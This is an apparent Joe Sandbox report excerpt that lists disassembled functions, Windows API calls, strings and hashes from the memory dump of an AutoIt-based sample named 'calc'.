Opcode ID: e33e89524776b087cd8796638c332008cf746c22a5aa01086639650adc447443
Instruction ID: 44a5a25657ab3b2f0f591ab9398c7da86f2146860005dfdfe1139e521f141202
Opcode Fuzzy Hash: e33e89524776b087cd8796638c332008cf746c22a5aa01086639650adc447443
Instruction Fuzzy Hash: FBE18F30E04269EFCF10DFA9D885AEEFBB1FF05314F54806AE450A7252C7789985CB99

Function 0042B6EB Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 263COMMON

Download Yara Rule

APIs

74D6A570.USER32(00000000,?), ref: 0042B7BF
SelectObject.GDI32(00000000,?), ref: 0042B7EC
SelectObject.GDI32(?,?), ref: 0042B814
GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 0042B847
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0042B87A
DeleteObject.GDI32(?), ref: 0042B886
DeleteDC.GDI32(?), ref: 0042B88F

Strings

(, xrefs: 0042B827

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Object$BitsDeleteSelect$A570
String ID: (
API String ID: 2880951867-3887548279
Opcode ID: a06560bb34f17590959d0d8a5a6711f3e45a4f402a2a6a738c4e51438627fe3f
Instruction ID: 4e215850921b11dc612f5a2bb87ee72c03226da213aabddab7a15e359a15e70d
Opcode Fuzzy Hash: a06560bb34f17590959d0d8a5a6711f3e45a4f402a2a6a738c4e51438627fe3f
Instruction Fuzzy Hash: 03A15A71D00219EFCF00DFA5D8848ADBBB5FF84350B54C56AE905A7211D738AA91DF94

Function 00457777 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 235COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0045785B
_strcat.LIBCMT ref: 00457878
___shr_12.LIBCMT ref: 00457941

Strings

1#SNAN, xrefs: 00457827
1#QNAN, xrefs: 0045786F
1#INF, xrefs: 00457852
1#IND, xrefs: 00457841
?, xrefs: 004577D8

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _strcat$___shr_12
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
API String ID: 1152255961-4131533671
Opcode ID: fb3d597f45c2d145ef8f255b84181ca1f35989882eff8c82b04386920a81ae14
Instruction ID: dac7b988a7f31c2646ab102d4da0209923bec554b4ffcb30ba6cbffe36e4aeb7
Opcode Fuzzy Hash: fb3d597f45c2d145ef8f255b84181ca1f35989882eff8c82b04386920a81ae14
Instruction Fuzzy Hash: 0F913671C0829A9EDF11DB68D8847EEBBB4AF15316F0445BBDC41AB283D3788609C779

Function 004013E2 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 195COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401412

Part of subcall function 00416990: CharUpperBuffW.USER32(00401448,?,?,00401448,CmdLineRaw), ref: 00416999

Part of subcall function 004169E0: CharUpperBuffW.USER32(00401494,?,?,?,00401494,CmdLine), ref: 004169EC

GetModuleFileNameW.KERNEL32(00000000,?,00000104,CmdLine), ref: 0040151F

Strings

/AutoIt3ExecuteLine, xrefs: 004014FC
/AutoIt3OutputDebug, xrefs: 004014D5
CmdLine, xrefs: 00401459, 0040147D
CmdLineRaw, xrefs: 0040142E
/AutoIt3ExecuteScript, xrefs: 0040154B
/ErrorStdOut, xrefs: 004014AE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: BuffCharFileModuleNameUpper
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CmdLine$CmdLineRaw
API String ID: 2024523369-3010741765
Opcode ID: 0d7f104c46213225820da23735dc2965e46fceabac7202cdb864c7589eb1f838
Instruction ID: 348f64aedd504845f7f551f83b668721e5f2da1375cbe9f9b59148a0ffc6890f
Opcode Fuzzy Hash: 0d7f104c46213225820da23735dc2965e46fceabac7202cdb864c7589eb1f838
Instruction Fuzzy Hash: DB615371E00218ABDF01ABA5C842AEEBB75DF44318F10006FF90177292EB78AD8597D9

Function 00422EA1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00422F74
SystemTimeToFileTime.KERNEL32(?,?), ref: 00422F82
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00422F8D
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0042302C
SetCurrentDirectoryW.KERNEL32(?), ref: 0042303F
SetCurrentDirectoryW.KERNEL32(?), ref: 00423088
SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 004230CA

Strings

*.*, xrefs: 00423090

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Time$CurrentDirectory$File$Local$System
String ID: *.*
API String ID: 1640188443-438819550
Opcode ID: 427eb3a9f93714729a7ff3aa90f5563d65ff183ad83eb8761ce986350e6fa38d
Instruction ID: bdb3071efd987846cfc0d3705619fa8a33cda40b97a1990c55567f1c35d9baa7
Opcode Fuzzy Hash: 427eb3a9f93714729a7ff3aa90f5563d65ff183ad83eb8761ce986350e6fa38d
Instruction Fuzzy Hash: AD617472A00228ABDF10DFA5DD85ACEB3B8AF04315F55409BE904A7105DB78EE85DB68

Function 0041FAEE Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 134windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56
MessageBoxW.USER32(?,?,00011010), ref: 0041FCAB

Strings

Line %d (File "%s"):, xrefs: 0041FBB5
Error: , xrefs: 0041FC40
Line %d:, xrefs: 0041FB9B
^ ERROR, xrefs: 0041FC0C
%s (%d) : ==> %s: %s %s, xrefs: 0041FC83

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: LoadString$Message
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 2278601591-2268648507
Opcode ID: dbc88b6028753eebd55926f2d2e90102df91fa1ff979e280e87bdffbe32b8cdb
Instruction ID: 6fc9e5af0b6feda39e0b2b0f3be66a4d0474c2105bc075db2bccfe6611d7421c
Opcode Fuzzy Hash: dbc88b6028753eebd55926f2d2e90102df91fa1ff979e280e87bdffbe32b8cdb
Instruction Fuzzy Hash: C3416576D00118AAEF21AB95CC45FDE77BCBB04308F0444B7F908E2152EA789A8D9F59

Function 004145F8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 00416372: LoadLibraryA.KERNEL32(kernel32.dll,0041461F,75730F00,00479E08), ref: 0041637D
Part of subcall function 00416372: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041638F

FreeLibrary.KERNEL32(00479E08,75730F00,00479E08), ref: 0041476B

Part of subcall function 00416399: LoadLibraryA.KERNEL32(kernel32.dll,00414630,75730F00,00479E08), ref: 004163A4
Part of subcall function 00416399: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004163B6

FreeLibrary.KERNEL32(?,75730F00,00479E08), ref: 0041475D

Part of subcall function 004163C0: LoadLibraryA.KERNEL32(kernel32.dll,00414641,75730F00,00479E08), ref: 004163CB
Part of subcall function 004163C0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004163DD

CloseHandle.KERNEL32(00000000), ref: 00414719
FreeLibrary.KERNEL32(?), ref: 0041472D
FreeLibrary.KERNEL32(?), ref: 00414737
FreeLibrary.KERNEL32(00479E08), ref: 00414741
FreeLibrary.KERNEL32(?,75730F00,00479E08), ref: 0041474F

Strings

su, xrefs: 00414722, 0041474F, 0041475D, 0041476B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$Free$AddressLoadProc$CloseHandle
String ID: su
API String ID: 59553586-45427494
Opcode ID: 7bc2e15a2c08dfa422e9ee046e246841171260878f1cd2375263530d5d94805e
Instruction ID: 27dac92add9ddf9618ea19e3f12248affa182d011fb36f9912dfa0d6a51cbeb4
Opcode Fuzzy Hash: 7bc2e15a2c08dfa422e9ee046e246841171260878f1cd2375263530d5d94805e
Instruction Fuzzy Hash: 03413A71C0021EEBCF11AFA1CC848EEBBB8BF49305F1440ABE515A2141D7389AC5CF99

Function 0040ACC5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,000000FF,000000FF,000000FF,static,00000000,00000000,?,?,00000000), ref: 0040AD6A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0040AD95
SelectObject.GDI32(00000000,00000000), ref: 0040AD9D
GetPixel.GDI32(00000000,00000000,00000000), ref: 0040ADA6
DeleteDC.GDI32(00000000), ref: 0040ADAF
FreeLibrary.KERNEL32(?), ref: 0040ADE1

Strings

static, xrefs: 0040AD06
su, xrefs: 0040ADE1

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: DeleteFreeLibraryMessageMoveObjectPixelSelectSendWindow
String ID: static$su
API String ID: 109832112-1742702580
Opcode ID: d591d34ae13dce0df897d2ae6259955c63a5f18172f723fdf8d5646ef0101bf3
Instruction ID: 46d34da8f58ca191638f5e8fa562867750dc08f6998696ef982bf1e62136dc5c
Opcode Fuzzy Hash: d591d34ae13dce0df897d2ae6259955c63a5f18172f723fdf8d5646ef0101bf3
Instruction Fuzzy Hash: 3B415C31400208FFCF119FA5DC48DDB3BB9EF89726B10426AF915A21A1D738CD61DB69

Function 00408346 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 004083DA
SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004083F8
GetDesktopWindow.USER32 ref: 00408401
GetWindowRect.USER32(00000000), ref: 00408408
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00408419
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0040842D

Strings

,, xrefs: 0040837A
tooltips_class32, xrefs: 004083D3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSendWindow$CreateDesktopRect
String ID: ,$tooltips_class32
API String ID: 1032049750-3856767331
Opcode ID: 9b8121fc188cf288ac9b5b5fef6ff443b3dc8ee524fe8ba7451b8fdb6dbb4574
Instruction ID: fe07c1e0de863ff4ca3345fb0f8a85e63066fb8b723ce0ea5c7ea8cd899b1c6a
Opcode Fuzzy Hash: 9b8121fc188cf288ac9b5b5fef6ff443b3dc8ee524fe8ba7451b8fdb6dbb4574
Instruction Fuzzy Hash: 95315CB2600309BFDB11DFA8DD85EAA7BB8FB08311F104429FA45E3251D775ED148B64

Function 00424304 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00424311
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,?,00000000), ref: 0042436D
GetLastError.KERNEL32 ref: 00424377

Strings

UNKNOWN, xrefs: 00424397
READY, xrefs: 004243BE
READONLY, xrefs: 004243A5
NOTREADY, xrefs: 0042439E
INVALID, xrefs: 004243AC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Error$DiskFreeLastModeSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 2351555085-14809454
Opcode ID: 28222a4f425f392fe2fcb0f80f5939013eb6b9de9b86fc8f19a2b2b2cc2a0c5d
Instruction ID: 9e21e8075b32901511b120586c6058870a00a7af5fab498cdf3aaad3efea1a69
Opcode Fuzzy Hash: 28222a4f425f392fe2fcb0f80f5939013eb6b9de9b86fc8f19a2b2b2cc2a0c5d
Instruction Fuzzy Hash: 9B219132700228ABDB10EBA5D805ADF77A4EF84711F954157EC01E72A1DA7CED81879E

Function 004028E7 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00402902
GetClassNameW.USER32(00000000,?,00000100), ref: 00402917
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004029A4

Strings

SHELLDLL_DefView, xrefs: 00402923
smallicons, xrefs: 0040296C
list, xrefs: 00402987
details, xrefs: 00402951
largeicons, xrefs: 00402936

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: d88d9084de9778645954b2dac89c947d0fa01af5cf27f13dcbfedf737330abc8
Instruction ID: e207e6aa0a9501f7c625afa673fde9d34c0ad767b1b7f61e043eefd813117af9
Opcode Fuzzy Hash: d88d9084de9778645954b2dac89c947d0fa01af5cf27f13dcbfedf737330abc8
Instruction Fuzzy Hash: 2811AFB2348305BEFA1096609E4EE6723DC9B04726F20146BFD42F21C2EAACAC01596D

Function 00424006 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 77COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00424013
GetDriveTypeW.KERNEL32(00000000,00000000), ref: 0042405D

Strings

Removable, xrefs: 004240A6
Network, xrefs: 00424090
Unknown, xrefs: 0042407B
RAMDisk, xrefs: 00424082
CDROM, xrefs: 00424089
Fixed, xrefs: 00424097

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: DriveErrorModeType
String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown
API String ID: 2651406809-706929342
Opcode ID: 08aff071bbe8387bd98da38cb827e2b383d3b77f2986837a44d38e406a4d18e4
Instruction ID: c236b00be81f74bb42f36345c47f50d6727ad15e36b1af1162972c05b99f5c91
Opcode Fuzzy Hash: 08aff071bbe8387bd98da38cb827e2b383d3b77f2986837a44d38e406a4d18e4
Instruction Fuzzy Hash: E921DE31704324EBC7206B65A845E5B3760EB80B15FA44157F706A72D1DA7CECC1864F

Function 0040F96A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,?,004101C0,00000000,0047BD30,00000000,Unterminated string,?,00000000,?,?,?,0040FF9B), ref: 0040F987
LoadStringW.USER32(00000000,?,004101C0,00000000), ref: 0040F98E
MessageBoxW.USER32(?,?,?,00011010), ref: 0040FA4C

Strings

Line %d (File "%s"):, xrefs: 0040F9E5
Line %d:, xrefs: 0040F9CF
%s (%d) : ==> %s.: %s %s, xrefs: 0040F9AE
Error: , xrefs: 0040FA08
., xrefs: 0040FA28

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: HandleLoadMessageModuleString
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 2734547477-4153970271
Opcode ID: 8148261fd63ca7fad340775ac33531daacb9e259fe7ff56dc5ab8cd291d0260c
Instruction ID: d526ee89b4f850ae7cdf24bbb3a648b0a8c45d5598141b054d4e4435141c55e2
Opcode Fuzzy Hash: 8148261fd63ca7fad340775ac33531daacb9e259fe7ff56dc5ab8cd291d0260c
Instruction Fuzzy Hash: B921367194020ABADF25BF90CC4AF8A7769AB08705F004063BA14A10D2D679DA68DB59

Function 00457A2F Relevance: 13.8, APIs: 9, Instructions: 299COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00462758,00000001,00462758,00000001,0045C490,00000048,004571DF,0045DC34,00000001,?,00000000,00000002,00000000,?), ref: 00457A68
GetLastError.KERNEL32(?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0,0045BBD8,00000018,00452DFD,0045BBE8,00000008,0044BA23), ref: 00457A7E
GetCPInfo.KERNEL32(00000000,00452DFD,0045C490,00000048,004571DF,0045DC34,00000001,?,00000000,00000002,00000000,?,?,00455B83,00000000,?), ref: 00457B23
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457BA6
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,0045BBD8,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C22
MultiByteToWideChar.KERNEL32(00000000,00000009,00000018,?,00000000,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C3F
MultiByteToWideChar.KERNEL32(00000000,00000001,00000018,?,?,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457CB5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide$CompareErrorInfoLastString
String ID:
API String ID: 1773772771-0
Opcode ID: a4c64eaa32b789bd732a7b88f9cc339c67f5fe8c820d4d7c2d69f0bb9a890e93
Instruction ID: 7feb89906a43771ec33674e053c7b17ab4a961398231c0e5b273a939fe000d16
Opcode Fuzzy Hash: a4c64eaa32b789bd732a7b88f9cc339c67f5fe8c820d4d7c2d69f0bb9a890e93
Instruction Fuzzy Hash: 45B1B131908209EFDF22DF54EC84BAE7BB6AF45346F24012BFC11A6252D7398D49CB59

Function 00450BDA Relevance: 13.7, APIs: 9, Instructions: 196COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00462758,00000001,00000000,00000000,0045BA70,00000024,0044B575,00000000,00000100,00000100,00000001,?,00000001,?), ref: 00450C01
GetLastError.KERNEL32(?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450C13
LCMapStringW.KERNEL32(?,00000100,004014B8,?,?,?,0045BA70,00000024,0044B575,00000000,00000100,00000100,00000001,?,00000001,?), ref: 00450C65
WideCharToMultiByte.KERNEL32(?,00000000,004014B8,?,00000000,00000000,00000000,00000000,0045BA70,00000024,0044B575,00000000,00000100,00000100,00000001,?), ref: 00450CC0
WideCharToMultiByte.KERNEL32(?,00000000,004014B8,?,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?), ref: 00450D32
LCMapStringA.KERNEL32(?,00000100,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450D4E
